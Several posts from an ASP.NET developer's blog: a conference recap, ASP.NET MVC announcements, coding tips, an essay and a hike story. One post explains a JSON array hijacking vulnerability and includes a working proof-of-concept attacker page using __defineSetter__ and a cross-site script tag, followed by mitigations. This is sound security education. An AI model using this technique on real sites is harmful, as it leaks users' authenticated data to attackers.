
When you visit Norway, it takes a week to recover. Ok, at least when I visit Norway, it takes a week. But that’s just a testament to the good time I had. As they say, what happens in Vegas stays in Vegas, but what happens in Oslo gets recorded as a .NET Rocks Live episode.

The week before last, I spent the week in Oslo, Norway attending and speaking at the Norwegian Developers Conference (NDC 09). This was not the typical Microsoft conference I usually attend, but a .NET conference with a heavy Agile software bent.


Just looking at the speaker line-up will tell you that. Scott Bellware tweeted a blurb recently that succinctly summarized my impression of the conference:

how to know you’re at a good conference: the speakers are going to sessions (at least the ones who aren’t working on their sessions)

That is definitely true. I didn’t attend as many talks as I would have liked, but I did manage to attend two by Mary Poppendieck which really sparked my imagination and got me excited about the concept of a problem solving organization and learning more about Lean. She had promised to put her slides on her site, but I can’t for the life of me find them! ;)

While there, I gave three talks, one of them being a joint talk with the Hanselnator (aka Mr. Hanselman).

**Black Belt Ninja Tips ASP.NET MVC**
This covered several tips on getting more out of ASP.NET MVC and included the first public demonstration of David Ebbo’s T4 template.

**ASP.NET MVC + AJAX = meant for each other**
This covered the Ajax helpers included with ASP.NET MVC and drilled into some of the lesser known client aspects of these helpers, such as showing the Sys.Mvc.AjaxContext object and how to leverage it. The talk then moved into a demonstration of the client templating feature of ASP.NET Ajax 4 Preview 4. I showed off some of the work Jonathan Carter and I (mostly Jonathan) did to make two-way data binding work with ASP.NET MVC. The audience really dug it.

**The Haacked and Hanselman Show**
So named because we didn’t have any agenda until about a week before the conference, this ended up being a web security talk where Scott would present a common “secure” implementation of a feature, I would then proceed to “Haack” the feature, and then Scott would fix the feature, all the while explaining what was going on. I think this was a very big hit, as we saw messages on Twitter like “I’m now too afraid to build a web application”. ;) Of course, I hope more attendees felt empowered rather than fearful. :P

The conference was held in an indoor soccer stadium since it was a venue large enough for all the attendees. They curtained off sections of the bleachers to create rooms for the talks. Outside the curtains hung large screens, so attendees who didn’t feel like sitting in the bleachers could walk around the conference floor with a headset and follow a talk from there.

Plenty of bean bags on the floor provided a comfortable place to relax and listen in. In fact, that’s where I would often find some of my new friends lounging around such as the crazy Irishman.

On the second night of the conference, we all rocked out at the big attendee party featuring the band DataRock, which played some rocking music with geek-friendly lyrics like:

I ran into her on computer camp
(Was that in 84?)
Not sure
I had my commodore 64
Had to score

– DataRock, Computer Camp Love

Many thanks to Kjetil Klaussen for posting those lyrics in his NDC 09 highlights post because I had forgotten pretty much every lyric. :) After DataRock, we all went upstairs for the after party to enjoy a more intimate setting with LoveShack, an 80s cover band.

One interesting highlight of the show was a live recording of .NET Rocks. The show was originally going to simply feature Scott Hanselman, but while hanging out in the speakers lounge Carl Franklin, one of the hosts of the show, suggested I join in the fun too.

While it was great fun, Scott is a big, no ginormous, personality and I rarely got a word in edgewise, except for the few times I swooped right in just in time to put my foot in my mouth to apparently great comedic effect. In any case, you can listen to the results yourself, though I hope they post the video soon to get the full effect of how much fun everyone was having. :) Be warned, there’s not a lot of real software development content in the show.

The conference ended on Friday leaving all of Saturday for me to relax and actually get out and see Oslo. On Saturday, I headed out to Vigeland Statue Park with an eclectic group of people, Ted Neward, Rocky Lhotka and his wife, Jeremy Miller, and Anna K{Something With Too Many Syllables in a Row}, a conference organizer herself.

The park was very beautiful and I took a ton of pictures, but unfortunately I lost my camera on the flight home from Norway. :( So instead, I’ll just include this Creative Commons licensed picture taken by Cebete from Flickr. The main difference was the sky was a deep blue when we visited.

That evening, Sondre Bjellås, an attendee, was kind enough to invite several of us over to his flat for a little gathering. I headed over with Bellware and Anna since everyone else was pretty much flattened by the previous week’s activities. It was great to meet non-techie Norwegians such as his wife and friends in order to get a different perspective on what it’s like to live in Norway. The answer: expensive!

In an odd coincidence, on my connecting flight in Philadelphia, I ran into my good friend Walter who happened to be flying home from Belgium. In fact, we were on the same flight in the same exit row with seats right next to each other. How’s that for a funny coincidence?

Show me the Code!

Rune, one of the organizers of the conference, assures me that the videos of the talks will be posted online soon, so you’ll get to see them if you’d like. I’ve also posted my PowerPoint slides and code samples here.

Please note that my talks tend to be heavy in demos, so the PowerPoint decks don’t have much content in them. Likewise, the code samples represent the “before” state of my talks, not the “after” state. I usually write up a checklist for each talk which I use to remind myself where I am in those cases where I have a total brain fart and forget my own name under the pressure of presenting.

Other NDC 09 Posts


In my last post, I wrote about the hijacking of JSON arrays. Near the end of the post, I mentioned a comment whereby someone suggests that what really should happen is that browsers should be more strict about honoring content types and not execute code with the content type of application/json.

I totally agree! But then again, browsers haven’t had a good track record with being strict with such standards and it’s probably too much to expect browsers to suddenly start tightening ship, not to mention potentially breaking the web in the process.

Another potential solution that came to mind was this: Can we simply change JSON? Is it too late to do that or has that boat left the harbor?


Let me run an idea by you. What if everyone got together and decided to version the JSON standard and change it in such a way that when the entire JSON response is an array, the format is no longer executable script. Note that I’m not referring to an array which is a property of a JSON object. I’m referring to the case when the entire JSON response is an array.

One way to do this, and I’m just throwing this out there, is to make it such that the JSON package must always begin and end with a curly brace. JSON objects already fulfill this requirement, so their format would remain unchanged.

But when the response is a JSON array, we would go from here:

[{"Id":1,"Amt":3.14},{"Id":2,"Amt":2.72}]

to here:

{[{"Id":1,"Amt":3.14},{"Id":2,"Amt":2.72}]}

Client code would simply check whether the JSON response starts with {[ to determine whether it’s an array or an object. There are many alternatives, such as simply wrapping ALL JSON responses in some new characters to keep it simple.
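On the server side, here’s a minimal sketch of what opting in to the wrapped format might look like in ASP.NET MVC. To be clear, WrappedJsonResult is a hypothetical name and the wrapping rule is my own illustration, not part of any shipping framework:

using System.Collections;
using System.Web.Mvc;
using System.Web.Script.Serialization;

// Hypothetical sketch: a JsonResult that emits the proposed {[...]}
// format whenever the top-level payload is an array.
public class WrappedJsonResult : JsonResult {
  public override void ExecuteResult(ControllerContext context) {
    var response = context.HttpContext.Response;
    response.ContentType = "application/json";
    string json = new JavaScriptSerializer().Serialize(Data);

    // Wrap anything that serializes as a top-level array in curly
    // braces so the response is no longer executable as a standalone
    // script. (A real implementation would need a more precise check.)
    if (Data is IEnumerable && !(Data is string)) {
      json = "{" + json + "}";
    }

    response.Write(json);
  }
}

A client library updated for the new format would then strip the outer braces before parsing whenever the payload starts with {[.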

It’d be possible to do this without breaking every site out there by simply giving all the client libraries a head start. We would update the JavaScript libraries which parse JSON to recognize this new syntax, but still support the old syntax. That way, they’d work with servers which haven’t yet upgraded to the new syntax.

As far as I know, most sites that make use of JSON are using it for Ajax scenarios so the site developer is in control of the client and server anyways. For sites that provide JSON as a cross-site service, upgrading the server before the clients are ready could be problematic, but not the end of the world.

So what do you think? Is this worth pursuing? Not that I have any idea on how I would convince or even who I would need to convince. ;)

UPDATE: 6/26 10:39 AM Scott Koon points out this idea is not new (I didn’t think it would be) and points to a great post that gives more detail on the specifics of executable JSON as it relates to the ECMAScript Specification.


A while back I wrote about a subtle JSON vulnerability which could result in the disclosure of sensitive information. That particular exploit involved overriding the JavaScript Array constructor to disclose the payload of a JSON array, something which most browsers do not support now.

However, there’s another related exploit that seems to affect many more browsers. It was brought to my attention recently by someone at Microsoft and Scott Hanselman and I demonstrated it at the Norwegian Developers Conference last week, though it has been demonstrated against Twitter in the past.


Before I go further, let me give you the punch line first in terms of what this vulnerability affects.

This vulnerability requires that you are exposing a JSON service which…

  • …returns sensitive data.
  • …returns a JSON array.
  • …responds to GET requests.
  • …is requested by a browser with JavaScript enabled (very likely the case).
  • …is requested by a browser that supports the __defineSetter__ method.

Thus if you never send sensitive data in JSON format, or you only send JSON in response to a POST request, etc. then your site is probably not vulnerable to this particular vulnerability (though there could be others).

I’m terrible with Visio, but I thought I’d give it my best shot and try to diagram the attack the best I could. In this first screenshot, we see the unwitting victim logging into the vulnerable site, and the vulnerable site issues an authentication cookie, which the browser holds onto.

Json-Hijack-1

At some point, either in the past, or the near future, the bad guy spams the victim with an email promising a hilariously funny video of a hamster on a piano.

Json-Hijack-2

But the link actually points to the bad guy’s website. When the victim clicks on the link, the next two steps happen in quick succession. First, the victim’s browser makes a request for the bad guy’s website.

Json-Hijack-3

The website responds with some HTML containing some JavaScript along with a script tag. When the browser sees the script tag, it makes another GET request back to the vulnerable site to load the script, sending the auth cookie along.

Json-Hijack-4

The bad guy has tricked the victim’s browser to issue a request for the JSON containing sensitive information using the browser’s credentials (aka the auth cookie). This loads the JSON array as executable JavaScript and now the bad guy has access to this data.

To gain a deeper understanding, it may help to see actual code (which you can download and run) which demonstrates this attack.

Note that the following demonstration is not specific to ASP.NET or ASP.NET MVC in any way, I just happen to be using ASP.NET MVC to demonstrate it. Suppose the Vulnerable Website returns JSON with sensitive data via an action method like this.

[Authorize]
public JsonResult AdminBalances() {
  var balances = new[] {
    new {Id = 1, Balance=3.14}, 
    new {Id = 2, Balance=2.72},
    new {Id = 3, Balance=1.62}
  };
  return Json(balances);
}

Assuming this is a method of HomeController, you can access this action via a GET request for /Home/AdminBalances which returns the following JSON:

[{"Id":1,"Balance":3.14},{"Id":2,"Balance":2.72},{"Id":3,"Balance":1.62}]

Notice that I’m requiring authentication via the AuthorizeAttribute on this action method, so an anonymous GET request will not be able to view this sensitive data.

The fact that this is a JSON array is important. It turns out that a script that contains a JSON array is a valid JavaScript script and can thus be executed. A script that just contains a JSON object is not a valid JavaScript file. For example, if you had a JavaScript file that contained the following JSON:

{"Id":1, "Balance":3.14}

And you had a script tag that referenced that file:

<script src="http://example.com/SomeJson"></script>

You would get a JavaScript error in your HTML page. However, through an unfortunate coincidence, if you have a script tag that references a file only containing a JSON array, that would be considered valid JavaScript and the array gets executed.

Now let’s look at the HTML page that the bad guy hosts on his/her own server:

<html> 
...
<body> 
    <script type="text/javascript"> 
        Object.prototype.__defineSetter__('Id', function(obj){alert(obj);});
    </script> 
    <script src="http://example.com/Home/AdminBalances"></script> 
</body> 
</html>

What’s happening here? Well the bad guy is changing the prototype for Object using the special __defineSetter__ method which allows overriding what happens when a property setter is being called.

In this case, any time a property named Id is being set on any object, an anonymous function is called which displays the value of the property using the alert function. Note that the script could just as easily post the data back to the bad guy, thus disclosing sensitive data.

As mentioned before, the bad guy needs to get you to visit his malicious page shortly after logging into the vulnerable site while your session on that site is still valid. Typically a phishing attack via email containing a link to the evil site does the trick.

If by blind bad luck you’re still logged into the original site when you click through to the link, the browser will send your authentication cookie to the website when it loads the script referenced in the script tag. As far as the original site is concerned, you’re making a valid authenticated request for the JSON data and it responds with the data, which now gets executed in your browser. This may sound familiar as it is really a variant of a Cross Site Request Forgery (CSRF) attack which I wrote about before.

If you want to see it for yourself, you can grab the CodeHaacks solution from GitHub and run the JsonHijackDemo project locally (right click on the project and select Set as StartUp Project). Just follow the instructions on the home page of the project to see the attack in action. It will tell you to visit http://demo.haacked.com/security/JsonAttack.html.

Note that this attack does not work on IE 8 which will tell you that __defineSetter__ is not a valid method. Last I checked, it does work on Chrome and Firefox.

The mitigation is simple. Either never send JSON arrays OR always require an HTTP POST to get that data (except in the case of non-sensitive data in which case you probably don’t care). For example, with ASP.NET MVC, you could use the AcceptVerbsAttribute to enforce this like so:

[Authorize]
[AcceptVerbs(HttpVerbs.Post)]
public JsonResult AdminBalances() {
  var balances = new[] {
    new {Id = 1, Balance=3.14}, 
    new {Id = 2, Balance=2.72},
    new {Id = 3, Balance=1.62}
  };
  return Json(balances);
}

One issue with this approach is that many JavaScript libraries such as jQuery request JSON using a GET request by default, not POST. For example, $.getJSON issues a GET request by default. So when calling into this JSON service, you need to make sure you issue a POST request with your client library.

ASP.NET and WCF JSON service endpoints actually wrap their JSON in an object with the “d” property as I wrote about a while back. While it might seem odd to have to go through this property to get access to your data, this awkwardness is eased by the fact that the generated client proxies for these services strip the “d” property so the end-user doesn’t need to know it was ever there.
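For example, the balances above would come back wrapped roughly like this (the exact envelope varies by framework and version):

{"d":[{"Id":1,"Balance":3.14},{"Id":2,"Balance":2.72},{"Id":3,"Balance":1.62}]}

Since the top-level token is now an object rather than an array, the response is no longer valid as a standalone script.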

With ASP.NET MVC (and other similar frameworks), a significant number of developers are not using client generated proxies (we don’t have them) but instead using jQuery and other such libraries to call into these methods, making the “d” fix kind of awkward.

What About Checking The Header?

Some of you might be wondering, “why not have the JSON service check for a special header such as the X-Requested-With: XMLHttpRequest or Content-Type: application/json before serving it up in response to a GET request?” I too thought this might be a great mitigation because most client libraries send one or the other of these headers, but a browser’s GET request in response to a script tag would not.
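In code, the check people have in mind might look something like this hypothetical ASP.NET MVC filter (the attribute name is made up for illustration):

using System.Web.Mvc;

// Hypothetical sketch of the header check under discussion. As
// explained below, caching makes this an unreliable mitigation.
public class RequireAjaxHeaderAttribute : ActionFilterAttribute {
  public override void OnActionExecuting(ActionExecutingContext filterContext) {
    var request = filterContext.HttpContext.Request;
    if (request.HttpMethod == "GET"
        && request.Headers["X-Requested-With"] != "XMLHttpRequest") {
      filterContext.Result = new HttpUnauthorizedResult();
    }
  }
}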

The problem with this (as a couple of co-workers pointed out to me) is that at some point in the past, the user may have made a legitimate GET request for that JSON in which case it may well be cached in the user’s browser or in some proxy server in between the victim’s browser and the vulnerable website. In that case, when the browser makes the GET request for the script, the request might get fulfilled from the browser cache or proxy cache. You could try setting No-Cache headers, but at that point you’re trusting that the browser and all proxy servers correctly implement caching and that the user can’t override that accidentally.

Of course, this particular caching issue isn’t a problem if you’re serving up your JSON using SSL.

The real issue?

There’s a post at the Mozilla Developer Center which states that object and array initializers should not invoke setters when evaluated, which at this point, I tend to agree with, though a comment to that post argues that perhaps browsers really shouldn’t execute scripts regardless of their content type, which is also a valid complaint.

But at the end of the day, assigning blame doesn’t make your site more secure. These types of browser quirks will continue to crop up from time to time and we as web developers need to deal with them. Chrome 2.0.172.31 and Firefox 3.0.11 were both vulnerable to this. IE 8 was not because it doesn’t support this method. I didn’t try it in IE 7 or IE 6.

It seems to me that to be secure by default, the default behavior for accessing JSON should probably be POST and you should opt-in to GET, rather than the other way around as is done with the current client libraries. What do you think? And how do other platforms you’ve worked with handle this? I’d love to hear your thoughts.

In case you missed it, here are the repro steps again: grab the CodeHaacks solution from GitHub and run the JsonHijackDemo project locally (right click on the project and select Set as StartUp Project). Just follow the instructions on the home page of the project to see the attack in action. To see a successful attack, you’ll need to do this in a vulnerable browser such as Firefox 3.0.11.

I followed up this post with a proposal to fix JSON to prevent this particular issue.

Tags: aspnetmvc, json, javascript, security, browsers

Tags: code

Every now and then some email or website comes along promising to prove Fred Brooks wrong about that crazy idea he wrote in The Mythical Man-Month (highly recommended reading!): that there is no silver bullet which by itself will provide a tenfold improvement in productivity, reliability, and simplicity within a decade.

This time around, the promise was much like the others, but they felt the need to note that their revolutionary new application/framework/doohickey will allow business analysts to directly build applications 10 times as fast without the need for programmers!

Ah yeah! Get rid of those foul smelling pesky programmers! We don’t need em!

Now wait one dag-burn minute! Seriously?!

I’m going to try real hard for a moment to forget they said that and not indulge my natural knee-jerk reaction, which is to flip the bozo bit immediately. If I were a more reflective person, this would raise a disturbing question:

Why are these business types so eager to get rid of us programmers?

It’s easy to blame the suits for not understanding software development and forcing us into a Tom Smykowski moment having to defend what it is we do around here.

Well-well look. I already told you: I deal with the god damn customers so the engineers don’t have to. I have people skills; I am good at dealing with people. Can’t you understand that? What the hell is wrong with you people?

Maybe, as Steven “Doc” List quotes from Cool Hand Luke in his latest End Bracket article on effective communication for MSDN Magazine,

What we’ve got here is a failure to communicate.

Leon Bambrick (aka SecretGeek) recently wrote about this phenomenon in his post entitled, The Better You Program, The Worse You Communicate, in which he outlines how techniques that make us effective software developers do not apply to communicating with other humans.

After all, we can sometimes be hard to work with. We’re often so focused on the technical aspects and limitations of a solution that we unknowingly confuse the stakeholders with jargon and annoy them by calling their requirements “ludicrous”. Sometimes, we fail to deeply understand their business and resort to making fun of our stakeholders rather than truly understanding their needs. No wonder they want to do the programming themselves!

Ok, ok. It’s not always like this. Not every programmer is like this and it isn’t fair to lay all the blame at our feet. I’m merely trying to empathize and understand the viewpoint that would lead to this idea that moving programmers out of the picture would be a good thing.

Some blame does deserve to lie squarely at the feet of these snake oil salespeople, because at the moment, they’re selling a lie. What they’d like customers to believe is that your average business analyst simply describes the business in their own words to the software, and it spits out an application.

The other day, I started an internal email thread describing in hand-wavy terms some feature I thought might be interesting. A couple hours later, my co-worker had an implementation ready to show off.

Now that, my friends, is the best type of declarative programming. I merely declared my intentions, waited a bit, and voila! Code! Perhaps that’s along the lines of what these types of applications hope to accomplish, but there’s one problem. In the scenario I described, it required feeding requirements to a human. If I had sent that email to some software, it would have no idea what to do with it.

At some point, something close to this might be possible, but only when software has reached the point where it can exhibit sophisticated artificial intelligence and really deal with fuzziness. In other words, when the software itself becomes the programmer, only then might you really get rid of the human programmer. But I’m sorry to say, you’re still working with a programmer, just one who doesn’t scoff at your requirements arrogantly (at least not in your face while it plots to take over the world, carrot-top).

Until that day, when a business analyst wires together an application with Lego-like precision using such frameworks, that analyst has in essence become a programmer. That work requires many of the same skills that developers require. At this point, you really haven’t gotten rid of programmers; you’ve just converted a business type into a programmer, but one who happens to know the business very well.

In the end, no matter how “declarative” a system you build and how foolproof it is such that a non-programmer can build applications by dragging some doohickeys around a screen, there’s very little room for imprecision and fuzziness, something humans handle well, but computers do not, as Spock demonstrated so well in an episode of Star Trek.

“Computer, compute the last digit of PI” - Spock

Throw into the mix that the bulk of the real work of building an application is not the coding, but all the work surrounding that, as Udi Dahan points out in his post on The Fallacy of ReUse.

This is not to say that I don’t think we should continue to invest in building better and better tools. After all, the history of software development is about building better and better higher level tools to make developers more productive. I think the danger lies in trying to remove the discipline and traits that will always be required when using these tools to build applications.

Even when you can tell the computer what you want in human terms, and it figures it out, it’s important to still follow good software development principles, ensure quality checks, tests, etc…

The lesson for us programmers, I believe, is two-fold. First, we have to educate our stakeholders about how software production really works. Even if they won’t listen, a little knowledge and understanding here goes a long way. Be patient, don’t be condescending, and hope for the best. Second, we have to educate ourselves about the business in a deep manner so that we are seen as valuable business partners who happen to write the code that matters.


A little while ago I announced our plans for ASP.NET MVC as it relates to Visual Studio 2010. ASP.NET MVC wasn’t included as part of Beta 1, which raised a few concerns (if not conspiracy theories!) among some. ;) The reason for this was simple, as I pointed out:

One thing you’ll notice is that ASP.NET MVC is not included in Beta 1. The reason for this is that Beta 1 started locking down before MVC 1.0 shipped. ASP.NET MVC will be included as part of the package in VS10 Beta 2.

We’re working hard to have an out-of-band installer which will install the project templates and tooling for ASP.NET MVC which works with VS2010 Beta 1 sometime in June on CodePlex. Sorry for the inconvenience. I’ll blog about it once it is ready.

Today I’m happy to announce that we’re done with the work I described and the installer is now available on CodePlex. Be sure to give it a try as many of the new VS10 features intended to support the TDD workflow fit very nicely with ASP.NET MVC, which ScottGu will describe in an upcoming blog post.

If you run into problems with the installer, try out this troubleshooting guide by Jacques, the developer who did the installer work, and do provide feedback.

You’ll notice that the installer says this is ASP.NET MVC 1.1, but as the readme notes point out, this is really ASP.NET MVC 1.0 retargeted for Visual Studio 2010. The 1.1 is just a placeholder version number. We bumped up the version number to avoid runtime conflicts with ASP.NET MVC 1.0. All of this and more is described in the Release Notes.

When VS10 Beta 2 comes out, you won’t need to download a separate standalone installer to get ASP.NET MVC (though a standalone installer will be made available for VS2008 users that will run on ASP.NET 3.5 SP1). A pre-release version of ASP.NET MVC 2 will be included as part of the Beta 2 installer as described in the …

Roadmap


I recently published the Roadmap for ASP.NET MVC 2 which gives a high level look at what features we plan to do for ASP.NET MVC 2. The features are noticeably lacking in details as we’re deep in the planning phase trying to gather pain points.

Right now, we’re avoiding focusing on the implementation details as much as possible. When designing software, it’s very easy to have preconceived notions about what the solution should be, even when we really don’t have a full grasp of the problem that needs to be solved.

Rather than guiding people towards what we think the solution is, I hope to focus on making sure we understand the problem domain and what people want to accomplish with the framework. That leaves us free to try out alternative approaches that we might not have considered before such as alternatives to expression based URL helpers. Maybe the alternative will work out, maybe not. Ideally, I’d like to have several design alternatives to choose from for each feature.

As we get further along the process, I’ll be sure to flesh out more and more details in the Roadmap and share them with you.

Snippets

One cool new feature of VS10 is that snippets now work in the HTML editor. Jeff King from the Visual Web Developer team sent me the snippets we plan to include in the next version. They are also downloadable from the CodePlex release page. Installation is very simple:

Installation Steps:

1) Unzip “ASP.NET MVC Snippets.zip” into “C:\Users\<username>\Documents\Visual Studio 10\Code Snippets\Visual Web Developer\My HTML Snippets”, where “C:\” is your OS drive.
2) Visual Studio will automatically detect these new files.

Try them out and let us know if you have ideas for snippets that will help you be more productive.

Important Links:


One of the features contained in the MVC Futures project is the ability to generate action links in a strongly typed fashion using expressions. For example:

<%= Html.ActionLink<HomeController>(c => c.Index()) %>

Will generate a link to the Index action of the HomeController.

It’s a pretty slick approach, but it is not without its drawbacks. First, the syntax is not one you’d want to take as your prom date. I guess you can get used to it, but a lot of people who see it for the first time kind of recoil at it.

The other problem with this approach is performance as seen in this slide deck I learned about from Brad Wilson. One of the pain points the authors of the deck found was that the compilation of the expressions was very slow.

I had thought that we might be able to mitigate these performance issues via some sort of caching of the compiled expressions, but that might not work very well. Consider the following case:

<% for(int i = 0; i < 20; i++) { %>

  <%= Html.ActionLink<HomeController>(c => c.Foo(i)) %>

<% } %>

Each time through that loop, the expression is the same: c => c.Foo(i)

But the value of the captured “i” is different each time. If we try to cache the compiled expression, what happens?
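To make the pitfall concrete, here’s a small illustration (assuming the HomeController has a Foo(int) action returning an ActionResult, as in the loop above):

using System;
using System.Linq.Expressions;
using System.Web.Mvc;

public class ExpressionCachePitfall {
  public static void Demonstrate() {
    Expression<Func<HomeController, ActionResult>> first, second;
    {
      int i = 1;
      first = c => c.Foo(i);
    }
    {
      int i = 2;
      second = c => c.Foo(i);
    }
    // Both expressions have the same shape: a call to c.Foo with a
    // captured local. A cache keyed on that shape couldn't tell them
    // apart, yet a delegate compiled from "first" calls Foo(1) while
    // "second" should call Foo(2), so the cache would hand back a
    // link built for the wrong value.
    var link1 = first.Compile();
    var link2 = second.Compile();
  }
}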

So I started thinking about an alternative approach using code generation against the controllers and circulated an email internally. One approach was to code-gen action-specific action link methods. Thus the About link for the home controller (assuming we add an id parameter for demonstration purposes) would be:

<%= HomeAboutLink(123) %>

Brad had mentioned many times that while he likes expressions, he’s no fan of using them for links and he tends to write specific action link methods just like the above. So what if we could generate them for you so you didn’t have to write them by hand?
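For illustration, such a generated method might look roughly like this hand-written equivalent (the extension-method shape and the names here are my own, not David’s actual generated code):

using System.Web.Mvc;
using System.Web.Mvc.Html;

public static class GeneratedActionLinks {
  // The kind of strongly typed helper a BuildProvider could emit
  // for an About(int id) action on HomeController.
  public static string HomeAboutLink(this HtmlHelper html, int id) {
    return html.ActionLink("About", "About", "Home", new { id }, null);
  }
}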

A couple hours after starting the email thread, David Ebbo had an implementation of this ready to show off. He probably had it done earlier for all I know, I was stuck in meetings. Talk about the best kind of declarative programming. I declared what I wanted roughly with hand waving, and a little while later, the code just appears! ;)

David’s approach uses a BuildProvider to reflect over the Controllers and Actions in the solution and generate custom action link methods for each one. There’s plenty of room for improvement, such as ensuring that it honors the ActionNameAttribute and generating overloads, but it’s a neat proof of concept.

One disadvantage of this approach compared to the expression based helpers is that there’s no refactoring support. However, if you rename an action method, you will get a compilation error rather than a runtime error, which is better than what you get without either. One advantage of this approach is that it performs fast and doesn’t rely on the funky expression syntax.

These are some interesting tradeoffs we’ll be looking closely at for the next version of ASP.NET MVC.


ASP.NET Pages are designed to stream their output directly to a response stream. This can be a huge performance benefit for large pages as it doesn’t require buffering and allocating very large strings before rendering. Allocating large strings can put them on the Large Object Heap which means they’ll be sticking around for a while.

However, there are many cases in which you really want to render a page to a string so you can perform some post processing. I wrote about one means using a Response filter eons ago.

However, recently, I learned about a method of the Page class I never noticed which allows me to use a much lighter weight approach to this problem.

The method in question is CreateHtmlTextWriter which is protected, but also virtual.

So here’s an example of the code-behind for a page that can leverage this method to filter the output before it’s sent to the browser.

using System.IO;
using System.Web.UI;

public partial class FilterDemo : System.Web.UI.Page
{
  HtmlTextWriter _oldWriter = null;
  StringWriter _stringWriter = new StringWriter();

  protected override HtmlTextWriter CreateHtmlTextWriter(TextWriter tw)
  {
    _oldWriter = base.CreateHtmlTextWriter(tw);
    return base.CreateHtmlTextWriter(_stringWriter);
  }

  protected override void Render(HtmlTextWriter writer)
  {
    base.Render(writer);
    string html = _stringWriter.ToString();
    html = html.Replace("REPLACE ME!", "IT WAS REPLACED!");
    _oldWriter.Write(html);
  }
}

In the CreateHtmlTextWriter method, we simply use the original logic to create the HtmlTextWriter and store it away in an instance variable.

Then we use the same logic to create a new HtmlTextWriter, but this one has our own StringWriter as the underlying TextWriter. The HtmlTextWriter passed into the Render method is the one we created. We call Render on that and grab the output from the StringWriter and now can do all the replacements we want. We finally write the final output to the original HtmlTextWriter which is hooked up to the response.

A lot of caveats apply in using this technique. First, as I mentioned before, for large pages, you could be killing scalability and performance by doing this. Also, I haven’t tested this with output caching, async pages, etc… etc…, so your mileage may vary.

Note, if you want to call one page from another, and get the output as a string within the first page, you can pass your own TextWriter to Server.Execute, so this technique is not necessary in that case.
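For completeness, that simpler cross-page case, called from within the first page, looks something like this (the page name is hypothetical):

// Render another page to a string by handing Server.Execute your
// own TextWriter; no custom HtmlTextWriter plumbing required.
StringWriter writer = new StringWriter();
Server.Execute("SomeOtherPage.aspx", writer);
string html = writer.ToString();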

Tags: personal

Being that it’s a glorious Memorial Day Weekend up here in the Northwest, my co-worker Eilon (developer lead for ASP.NET MVC) and I decided to go on a hike to Mt Si where we had a bit of a scary moment.

I first learned about Mt Si at the company picnic last year, seen behind me and Cody in this photo. I remember seeing the imposing cliff face and thinking to myself, I want to climb up there. I imagined the view would be quite impressive.

Mt Si is a moderately strenuous 8-mile round-trip hike with an elevation gain of 3,100 feet, taking you to about 3,600 feet, according to the Washington Trails Association website. Given that it is a very popular hike and that this was a three-day weekend, we figured we’d get an early start by heading over there at 7 AM.

That ended up being a good idea as the parking lot had quite a few cars already, but it wasn’t full by any means. This is a picture of the trail head which starts the hike off under a nice canopy of green.

Right away, the no-nonsense trail starts you off huffing uphill amongst a multitude of trees.


Along the way, there are the occasional diversions. For example, this one won me $10 as the result of a bet that I wouldn’t walk to the edge of the tree overhanging the drop off.


When you get to the top, there’s a great lookout with amazing views. But what caught our attention is a rock outcropping called the “Haystack”, which takes you up another 500 feet. Near the base of the Haystack is a small memorial for those who’ve died from plummeting off its rocky face. It’s not a trivial undertaking, but I demanded we try.

Unfortunately, there’s nothing in the above picture to provide a better sense of scale for this scramble. In the following picture you can see some people pretty much scooting down the steep slope on their butts.


Once they were down, we set out and reached around two thirds of the way up when I made the mistake of looking back and remarking on how much more difficult it was going to be going down. That started getting us nervous because it’s always easier going up than down.

It would have probably been best if I hadn’t made that remark because the climb wasn’t really that difficult, but introducing a bit of nervousness into the mix can really sabotage one’s confidence, which you definitely want on a climb.

At that point, the damage was done and we decided we had enough and started heading back down. Better to try again another day when we felt more confident. At that moment, a couple heading down told us we were almost there and it wasn’t so bad. Our success heading back down and their comments started to bolster our confidence to the point where I was ready to head back up, until I noticed that my shoe felt odd.

What I hadn’t noticed while climbing on the steep face was that my sole had almost completely detached from my hiking boot during the climb. Fortunately, Eilon had some duct tape on hand allowing me to make this ghetto looking patch job.

At this point I had a mild panic because I worried that the duct tape would cause me to lose grip with my boots on the way down. And frankly, I was pissed off as well, as I’ve had these boots for a few years but haven’t hiked in them all that often. What a perfect time for them to completely fall apart!

Fortunately, I didn’t have much problem climbing back down and we stopped at the first summit to take some pictures and have a brief snack.

Not having the guts today to climb the big rock, I scrambled up a much smaller one and got this great view of Mt Rainier in its full splendor.


The view from the top is quite scenic and using binoculars, I was able to check on my family back in Bellevue (joke).

Going back down was much quicker than the way up and we had a blast of it practically trail running the first part, until my other shoe gave out.

Guess the warranty must have run out yesterday. ;) Fortunately, Eilon, who was prepared with the duct tape, also had all-terrain sandals with him, which I wore the rest of the way. Next time, I think I’ll ditch the Salomon boots and try Merrells, which other hikers I ran into were wearing.

Despite the mishaps, the hike was really a fun romp in the woods and I highly recommend it to anyone in the Seattle area to give it a try. Go early to avoid the crowds. I doubled my $10 in an over/under bet where I took 140 and over cars in the lot. We stopped counting at around 170 cars in the lot when we left.

This is one last look at Mt Si on our way back home. Eilon put together a play-by-play using Live Maps Bird’s Eye view (click for larger).

For more info on the Mt Si hike, check out the Washington Trails Association website.

Tags: asp.net, code, asp.net mvc

This post is now outdated

I apologize for not blogging this over the weekend as I had planned, but the weather this weekend was just fantastic so I spent a lot of time outside with my son.

If you haven’t heard yet, Visual Studio 2010 Beta 1 is now available for MSDN subscribers to download. It will be more generally available on Wednesday, according to Soma.

You can find a great whitepaper describing what’s new for web developers in ASP.NET 4, which is included.

One thing you’ll notice is that ASP.NET MVC is not included in Beta 1. The reason for this is that Beta 1 started locking down before MVC 1.0 shipped. ASP.NET MVC will be included as part of the package in VS10 Beta 2.

Right now, if you try and open an MVC project with VS 2010 Beta 1, you’ll get some error message about the project type not being supported. The easy fix for now is to remove the ASP.NET MVC ProjectTypeGuid entry as described by this post.
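If you haven’t seen that post, the fix amounts to editing the .csproj file and trimming the MVC GUID out of the ProjectTypeGuids element; schematically (the GUID values below are placeholders, not the real ones):

<!-- Before: the first GUID marks the project as ASP.NET MVC -->
<ProjectTypeGuids>{MVC-GUID};{WEB-APP-GUID};{CSHARP-GUID}</ProjectTypeGuids>

<!-- After: with the MVC GUID removed, Beta 1 opens it as a plain web application -->
<ProjectTypeGuids>{WEB-APP-GUID};{CSHARP-GUID}</ProjectTypeGuids>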

We’re working hard to have an out-of-band installer which will install the project templates and tooling for ASP.NET MVC which works with VS2010 Beta 1 sometime in June on CodePlex. Sorry for the inconvenience. I’ll blog about it once it is ready.

Tags: asp.net, code, asp.net mvc

